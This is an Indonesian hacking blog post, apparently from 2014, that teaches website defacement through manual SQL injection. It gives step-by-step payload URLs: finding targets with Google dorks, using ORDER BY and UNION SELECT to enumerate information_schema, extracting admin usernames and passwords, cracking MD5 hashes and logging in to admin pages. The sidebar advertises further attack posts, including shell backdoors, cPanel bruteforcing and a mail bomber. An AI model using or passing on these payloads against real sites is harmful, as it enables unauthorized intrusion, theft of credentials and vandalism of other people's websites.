Cara Deface Web Dengan SQL Manual
Anonymous
01:58
No comments
Cara Deface Web Dengan SQL Manual -
Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah-langkahnya.
1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari DISINI
2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu
3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'
4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya :
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--
Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)
6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar
7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--
8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh :
www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web
9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh :
www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh :
www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password
11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--
12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.
13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini
Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
-Mr.HaurgeulisX196-
Popular Posts
-
Assalamuallaikum ^_^ kali ini saya akan membagikan cara mudah untuk men-download video di Youtube tanpa software. Youtube, menjadi situs u...
-
Siang sob ^_^ Sebenernya gw binggung mau nge-share apa :v Yaudah deh mending gw share cara Deface Website dengan teknik XSS Vulnerability ~ ...
-
Assalamuallaikum ^_^ kali ini saya mau berbagi cara memasukan kode lagu (lagu) dalam script deface atau HTML pasti bosen kan tanpa lagu :v w...
-
Halo ^_^ kali ini saya mau share tentang Shell backdor :v langsung saja 1. R57 Shell Download 2. C99 Shell Download 3. B374K Shell Download...
-
DEFACE Secara singkat Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs, Teknik ini biasa di lakuka...
-
Oke jumpa lagi dengan saya... hehehe. Kali ini mau share seddikit trik deface ala newbie dengan dorking shell. Biasa nya defacer memasang s...
-
Assalamuallaikum halo ^_^ saya balik lagi saya dapet hadiah :v wkwkwk iseng2 uplek2 sendiri domain sch.id eh dapet trick :p langsung saja D...
-
iseng2 nanem shell di web Indonesia Ngetes aja. Kebetulan pake server LitleSpeed. Nah, pada tau kan pasti Disabled Function nya banyak bang...
-
Teknik ini sebenarnya sudah lama sekali ~ Teknik ini sangat mudah sekali jadi cocok untuk para newbie yang ingin belajar deface termasuk ...
-
Assalamuallaikum ^_^ kali ini saya mau share tentang bagaimana cara upload shell com_user versi ke-2 versi 1 silahkan KLIK DISINI oke bahan...
About Me
Powered by Blogger.
Blog Archive
-
▼
2014
(216)
-
▼
June
(59)
- Mengenal Komponen-Komponen Elektronika
- Cara Mengetahui Web Yang Kita Config
- Deface Dengan Cara Mencari Config
- Bypass Halaman Administrator Joomla yang di Redirect
- Bypass Halaman Login Wordpress yang di Redirrect
- Hack cPanel With cPanel Bruteforce
- Upload Shell Di CMS Wordpress
- Deface Dengan Teknik Symlink
- Cara Membuat Tulisan HTML Berjalan Seperti Diketik
- Cara Daftar Domain ML
- Cara Menambahkan Music Di HTML
- Download Chrome Browser Terbaru
- CARA KERJA OSILATOR
- Download Lagu Superman Is Dead - Album Sunset Di T...
- Dork Com_User
- Download Havij 1.15
- [DOWNLOAD ] Template | AKB48 Version
- Download JKT48 - 6th Single - Gingham Check
- Belajar Bermain Dork
- Perbedaan Web Statis dengan Web Dinamis
- Cara Deface Web Dengan SQL Manual
- Cara Upload Shell Web Joomla | Com_User Versi 3
- Cara Upload Shell Web Joomla | Com_User Versi 2
- Cara Deface Com_User Auto Exploiter
- CONTOH PROGRAM C++ MENGHITUNG GAJI KARYAWAN (tanpa...
- Tema Google Chrome JKT48
- Foto-foto Thalia (Tata) JKT48 Tim KIII
- Biodata Profil Dan Fakta Devi Kinal Putri
- Download Tema Google Nabilah Ratna Ayu Azalia JKT48
- Download Tema Shania JKT48 For Android
- AKB48 & JKT48 GIF
- Download Game JKT48 Date Your Oshimen
- Game Delusi "JKT48 DATE YOUR OSHIMEN" versi THALIA
- Biodata Tata JKT48 & Foto Terbaru
- Script Simple 2
- Com User Scanner Python and Joomla Vulnerability S...
- Exploit FileChucker File Upload Vulnerability
- Selamat Ulang Tahun Ir.Soekarno
- Deface Web Joomla (Joomla Com_Collecter Shell Upload)
- Bahaya Memencet Tombol F5
- Tutorial Hack Website Dengan Bypass SQL Login
- Share Script PHP Mail Bomber
- Deface Ala Newbie dengan Dorking Shell Backdoor di...
- Bypass Disabled Functions on LiteSpeed Server
- Cara Mudah Download Video di Youtube Tanpa Software
- Pujiono - Manisnya_Negriku
- Cara Mengganti Icon Folder JKT48
- File Jumping PHP Haurgeulis Security
- List Domain Seluruh Dunia dari A sampai Z List Dom...
- Tutorial Encode Shell
- Happy Birthday Shinta Naomi
- Young Lex ft Chris Celo - Ga Peka
- Cara Deface dengan Teknik Com_User | Inpect Element
- Diztroya - My Pride
- Tutorial Deface Dengan Webdav
- LAYER TRANSPORT DALAM OSI
- Cara Upload shell di CMS SCHOOLHOS
- Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF (...
- Upload shell di CMS Opencart
-
▼
June
(59)
0 comments:
Post a Comment